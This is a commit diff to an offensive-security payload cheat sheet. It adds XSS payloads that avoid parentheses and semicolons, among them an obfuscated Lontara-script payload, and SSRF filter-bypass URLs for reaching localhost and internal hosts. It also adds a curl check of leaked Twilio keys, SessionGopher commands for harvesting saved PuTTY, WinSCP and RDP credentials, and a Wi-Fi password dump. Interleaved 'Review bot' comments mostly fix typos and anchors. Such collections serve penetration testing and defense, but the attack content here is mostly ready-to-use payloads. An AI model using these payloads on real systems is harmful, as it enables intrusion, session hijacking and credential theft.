XSS without parenthesis, semi-colon + Lontara

This commit is contained in:
Swissky 2019-05-15 21:55:17 +02:00
parent cc8c7b3e70
commit 9c2e63818f
5 changed files with 92 additions and 16 deletions

View File

@ -15,6 +15,7 @@
- [BAZAAR - Source code management](#bazaar---source-code-management) - [BAZAAR - Source code management](#bazaar---source-code-management)
- [Automatic way : rip-bzr](#automatic-way--rip-bzr) - [Automatic way : rip-bzr](#automatic-way--rip-bzr)
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper) - [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
- [Leaked API keys](#leaked-api-keys)
## GIT - Source code management ## GIT - Source code management
@ -236,6 +237,16 @@ $ bzr revert
N static/ N static/
``` ```
## Leaked API keys
If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.
Twilio example :
```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
```
## References ## References
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
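Review bot: the new "Leaked API keys" section has two typos in its opening sentence (`key ,` should be `key,` and `verifiy` should be `verify`), and the fence is tagged `powershell` for what is a curl one-liner; `bash` fits better unless the file deliberately uses `powershell` for every block. It would also help the reader to say what a "verified" key means here: the Twilio example sends the found SID/token pair as HTTP basic auth, so a 200 with a JSON key list confirms the credential is live, while a 401 means it is revoked or wrong. That one sentence tells a triager when a leaked key still needs rotating.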

View File

@ -686,3 +686,4 @@ net group "Domain Admins" hacker2 /add /domain
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)

View File

@ -320,6 +320,19 @@ Oneliner method to extract wifi passwords from all the access point.
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
``` ```
### Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
```powershell
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
```
## EoP - Processes Enumeration and Tasks ## EoP - Processes Enumeration and Tasks
What processes are running? What processes are running?
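Review bot: the first line of the SessionGopher block is a bare URL, not a command, so copy-pasting the block fails at line one; either make it a comment (`# download SessionGopher.ps1 from <url>`) or replace it with the download step that precedes `Import-Module`. The intro sentence is also a fragment with no verb ("Saved session information for ... using SessionGopher"); "Extract saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY and RDP with SessionGopher" reads as the instruction it is meant to be. Finally, `-o` is used without saying what it does; a trailing comment on that line would save the reader a trip to the tool's README.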

View File

@ -7,6 +7,19 @@
* [Tools](#tools) * [Tools](#tools)
* [Payloads with localhost](#payloads-with-localhost) * [Payloads with localhost](#payloads-with-localhost)
* [Bypassing filters](#bypassing-filters) * [Bypassing filters](#bypassing-filters)
* [Bypass using HTTPS](#bypass-using-https)
* [Bypass localhost with [::]](#bypass-localhost-with----)
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
* [Bypass using malformed urls](#bypass-using-malformed-urls)
* [Bypass using rare address](#bypass-using-rare-address)
* [Bypass using bash variables](#bypass-using-bash-variables)
* [Bypass using tricks combination](#bypass-using-tricks-combination)
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
* [Bypass filter_var() php function](#bypass-filter-var-php-function)
* [Bypass against a weak parser](#bypass-against-a-weak-parser)
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
* [file://](#file) * [file://](#file)
* [http://](#http) * [http://](#http)
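Review bot: three of the new TOC anchors probably do not resolve on the rendered page and should be checked against it. GitHub builds a heading slug by lowercasing, dropping characters other than letters, digits, spaces, hyphens and underscores, then turning spaces into hyphens, so "Bypass localhost with [::]" does not become `#bypass-localhost-with----`, "Bypass using IPv6/IPv4 Address Embedding" becomes `#bypass-using-ipv6ipv4-address-embedding` (the `/` is dropped, not replaced), and "Bypass filter_var() php function" keeps its underscore as `#bypass-filter_var-php-function`. The `[::]` entry has a second problem: the nested square brackets inside the link text break some Markdown parsers, so escape them as `\[::\]` in the link text.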
@ -15,7 +28,7 @@
* [tftp://](#tftp) * [tftp://](#tftp)
* [ldap://](#ldap) * [ldap://](#ldap)
* [gopher://](#gopher) * [gopher://](#gopher)
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera) * [SSRF to XSS](#ssrf-to-xss)
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
@ -75,14 +88,14 @@ Using this vulnerability users can upload images from any image URL = trigger an
## Bypassing filters ## Bypassing filters
Bypass using HTTPS ### Bypass using HTTPS
```powershell ```powershell
https://127.0.0.1/ https://127.0.0.1/
https://localhost/ https://localhost/
``` ```
Bypass localhost with [::] ### Bypass localhost with [::]
```powershell ```powershell
http://[::]:80/ http://[::]:80/
@ -98,7 +111,7 @@ http://0000::1:22/ SSH
http://0000::1:3128/ Squid http://0000::1:3128/ Squid
``` ```
Bypass localhost with a domain redirecting to locahost ### Bypass localhost with a domain redirection
```powershell ```powershell
http://localtest.me http://localtest.me
@ -113,16 +126,17 @@ The service nip.io is awesome for that, it will convert any ip address as a dns.
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1 NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
``` ```
Bypass localhost with CIDR : 127.x.x.x ### Bypass localhost with CIDR
It's a /8
```powershell ```powershell
it's a /8
http://127.127.127.127 http://127.127.127.127
http://127.0.1.3 http://127.0.1.3
http://127.0.0.0 http://127.0.0.0
``` ```
Bypass using a decimal ip location ### Bypass using a decimal IP location
```powershell ```powershell
http://0177.0.0.1/ http://0177.0.0.1/
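Review bot: moving "It's a /8" out of the code block is right, but the heading lost the `127.x.x.x` part, so the prose line no longer says which /8 is meant; "The whole 127.0.0.0/8 range is loopback, not just 127.0.0.1" keeps that information and states why the addresses below work. In the context lines of the following section, `http://0177.0.0.1/` is an octal representation of 127.0.0.1, not a decimal one, so it sits under the wrong heading; either mention octal in the "decimal IP location" heading or move that line next to the other rare-address forms.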
@ -131,20 +145,24 @@ http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1 http://3232235777/ = http://192.168.1.1
``` ```
Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm) ### Bypass using IPv6/IPv4 Address Embedding
[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
```powershell ```powershell
http://[0:0:0:0:0:ffff:127.0.0.1] http://[0:0:0:0:0:ffff:127.0.0.1]
``` ```
Bypass using malformed urls ### Bypass using malformed urls
```powershell ```powershell
localhost:+11211aaa localhost:+11211aaa
localhost:00011211aaaa localhost:00011211aaaa
``` ```
Bypass using rare address, you can short-hand IP addresses by dropping the zeros ### Bypass using rare address
You can short-hand IP addresses by dropping the zeros
```powershell ```powershell
http://0/ http://0/
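Review bot: the `[IPv6/IPv4 Address Embedding](...)` line now stands alone under its heading as a bare link with no sentence around it; "See the TCP/IP Guide page on [IPv6/IPv4 Address Embedding](...) for the mapped-address form used below" reads better and explains the `::ffff:127.0.0.1` notation. Also "malformed urls" should be "malformed URLs" to match the capitalisation used elsewhere in the file.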
@ -152,14 +170,16 @@ http://127.1
http://127.0.1 http://127.0.1
``` ```
Bypass using bash variables (curl only) ### Bypass using bash variables
(curl only)
```powershell ```powershell
curl -v "http://evil$google.com" curl -v "http://evil$google.com"
$google = "" $google = ""
``` ```
Bypass using tricks combination ### Bypass using tricks combination
```powershell ```powershell
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
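Review bot: "(curl only)" is now an orphan line under the heading; fold it into a sentence, and while doing so correct the claim, because the trick is not curl-specific. The shell expands `$google` to an empty string before curl ever runs, so any client invoked from a shell with an unquoted or double-quoted URL behaves the same; the point is that a filter looking for `evil.com` in the argument never sees it. The context lines also show `$google = ""` after the curl call and with spaces around `=`, which is not a valid bash assignment (it runs `$google` as a command); `google=""` on the line before the curl call is what the block intends.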
@ -168,7 +188,9 @@ requests + browsers : 2.2.2.2
urllib : 3.3.3.3 urllib : 3.3.3.3
``` ```
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow) ### Bypass using enclosed alphanumerics
[@EdOverflow](https://twitter.com/EdOverflow)
```powershell ```powershell
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
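Review bot: after the heading split, `[@EdOverflow](...)` is a bare line with no context, and the same pattern appears in the later hunks for Orange Tsai ("by Orange Tsai (...)") and for the SSRF to XSS section ("by [@D0rkerDevil & @alyssa.o.herrera](...)"). A consistent "Credit: ..." or "Source: ..." prefix on each of these lines keeps the attribution readable now that it no longer follows the section title on the same line.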
@ -177,13 +199,15 @@ List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
``` ```
Bypass filter_var() php function ### Bypass filter_var() php function
```powershell ```powershell
0://evil.com:80;http://google.com:80/ 0://evil.com:80;http://google.com:80/
``` ```
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)) ### Bypass against a weak parser
by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
```powershell ```powershell
http://127.1.1.1:80\@127.2.2.2:80/ http://127.1.1.1:80\@127.2.2.2:80/
@ -317,7 +341,9 @@ Content of evil.com/redirect.php:
?> ?>
``` ```
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) ## SSRF to XSS
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
```bash ```bash
http://brutelogic.com.br/poc.svg -> simple alert http://brutelogic.com.br/poc.svg -> simple alert

View File

@ -28,6 +28,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter) - [Bypass dot filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string) - [Bypass parenthesis for string](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist) - [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
- [Bypass space filter](#bypass-space-filter) - [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter) - [Bypass email filter](#bypass-email-filter)
@ -39,6 +40,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana) - [Bypass using Katana](#bypass-using-katana)
- [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6) - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding) - [Bypass using Octal encoding](#bypass-using-octal-encoding)
- [Bypass using Unicode](#bypass-using-unicode) - [Bypass using Unicode](#bypass-using-unicode)
@ -525,6 +527,21 @@ alert`1`
setTimeout`alert\u0028document.domain\u0029`; setTimeout`alert\u0028document.domain\u0029`;
``` ```
### Bypass parenthesis and semi colon
```javascript
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
// From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```
### Bypass onxxxx= blacklist ### Bypass onxxxx= blacklist
```javascript ```javascript
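Review bot: the block is tagged `javascript` but every line is an HTML `<script>` element, so the `// From @garethheyes` attribution lines would be literal page text if pasted as written; tag the block `html` and move the credits to HTML comments or into the prose. The last payload (`TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']`) contains `alert(1)`, so it does not avoid parentheses and does not belong under a "Bypass parenthesis and semi colon" heading without a note saying what it does avoid. A one-line explanation would also make the section useful for defenders: assigning a handler to `onerror` and then `throw`ing a value passes that value to the handler as its argument, which is why a filter that only blocks `(` and `;` stops nothing here. "semi colon" should be "semicolon" in both the heading and the TOC entry.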
@ -704,6 +721,14 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
``` ```
### Bypass using Lontara
```javscript
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
```
More alphabets on http://aem1k.com/aurebesh.js/#
### Bypass using ECMAScript6 ### Bypass using ECMAScript6
```html ```html
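Review bot: the fence is tagged `javscript`, a typo that disables syntax highlighting; it should be `javascript`. The closing "More alphabets on http://aem1k.com/aurebesh.js/#" line is a bare URL; the Katakana section just above phrases the same idea as "Using the [Katakana](...) library", so "Generated with the [aurebesh.js](http://aem1k.com/aurebesh.js/#) encoder, which supports other alphabets as well" keeps the two sections consistent and tells the reader the payload is generated rather than hand-written.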